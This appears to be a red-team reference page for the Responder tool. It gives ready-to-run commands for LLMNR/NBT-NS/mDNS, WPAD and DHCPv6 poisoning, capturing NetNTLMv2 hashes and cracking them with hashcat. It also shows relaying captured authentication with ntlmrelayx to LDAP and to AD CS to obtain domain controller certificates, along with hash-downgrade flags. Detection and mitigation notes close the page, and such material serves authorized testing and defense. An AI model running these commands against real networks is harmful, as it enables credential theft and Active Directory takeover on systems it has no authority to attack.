Responder
Overview
Responder poisons LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) requests to capture authentication credentials on the local network. When a Windows host fails to resolve a hostname via DNS, it falls back to broadcast protocols — Responder answers these requests, directing the victim to the attacker's machine. The victim then authenticates (NTLM) to the attacker, revealing NetNTLMv2 hashes that can be cracked offline or relayed.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Prerequisites
- Network access on the same broadcast domain as the target(s)
- Root/sudo on the attacker (Responder binds to privileged ports)
- On Kali:
sudo apt install -y responder
Techniques
Basic Poisoning
# Responder
# https://github.com/lgandx/Responder
# Start Responder on the network interface
sudo responder -I eth0 -v
Responder listens for LLMNR/NBT-NS/mDNS queries and responds, capturing NTLMv2 hashes from any host that authenticates.
Analyze Mode (Passive)
Observe name resolution requests without poisoning:
# Responder
# https://github.com/lgandx/Responder
# Passive analysis — see what's on the network without poisoning
sudo responder -I eth0 -Av
WPAD Poisoning
Force authentication through a rogue Web Proxy Auto-Discovery proxy:
# Responder
# https://github.com/lgandx/Responder
# Enable WPAD and force auth
sudo responder -I eth0 -wFv
# DHCP + WPAD injection
sudo responder -I eth0 -Pvd
DHCPv6 Poisoning
# Responder
# https://github.com/lgandx/Responder
# DHCPv6 + Proxy authentication
sudo responder -I eth0 --dhcpv6 -Pv
Crack Captured Hashes
Captured hashes are saved to /usr/share/responder/logs/ (created at runtime — filenames such as SMB-NTLMv2-Client-<IP>.txt). The session database Responder.db is saved directly to /usr/share/responder/.
# Hashcat
# https://github.com/hashcat/hashcat
# Crack NetNTLMv2 — mode 5600
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# Crack NetNTLMv1 — mode 5500
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt
NTLM Relay (Instead of Cracking)
Instead of cracking hashes, relay the captured authentication to another service. Requires disabling Responder's SMB and HTTP servers so ntlmrelayx can listen:
# Edit Responder config to disable SMB and HTTP
# /etc/responder/Responder.conf
# SMB = Off
# HTTP = Off
# Start Responder (poisoning only, no auth servers)
sudo responder -I eth0 -v
# In another terminal — relay captured auth
# Impacket
# https://github.com/fortra/impacket
impacket-ntlmrelayx -tf targets.txt -smb2support
# Relay to LDAP for AD attacks
impacket-ntlmrelayx -t ldap://<dc_ip> --escalate-user <user>
# Relay to AD CS web enrollment
impacket-ntlmrelayx -t http://<ca_ip>/certsrv/certfnsh.asp --adcs --template DomainController
Key Flags
| Flag | Description |
|---|---|
-I <interface> |
Network interface to listen on |
-v |
Verbose output |
-A |
Analyze mode (passive, no poisoning) |
-w |
Start WPAD rogue proxy |
-F |
Force WPAD authentication |
-P |
Force proxy authentication |
-d |
DHCP poisoning (inject WPAD) |
--dhcpv6 |
DHCPv6 poisoning |
-b |
Return Basic auth instead of NTLM (cleartext) |
--lm |
Force LM hashing downgrade |
--disable-ess |
Disable Extended Session Security (NTLMv1 downgrade) |
-e <IP> |
Poison with external IP |
Detection Methods
Network-Based Detection
- LLMNR/NBT-NS responses from unauthorized hosts
- Multiple name resolution responses for the same query (legitimate + poisoned)
- WPAD responses from non-configured WPAD servers
Host-Based Detection
- Responder process running on a host
- Unexpected NTLM authentication attempts to unknown servers
- Failed authentication events following broadcast name resolution
Mitigation Strategies
- Disable LLMNR — Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution
- Disable NBT-NS — Network adapter settings > TCP/IP > Advanced > WINS > Disable NetBIOS over TCP/IP
- Disable WPAD — Group Policy: disable "Automatically detect settings" in proxy configuration
- Enable SMB Signing — prevents NTLM relay attacks
- Network segmentation — limit broadcast domain size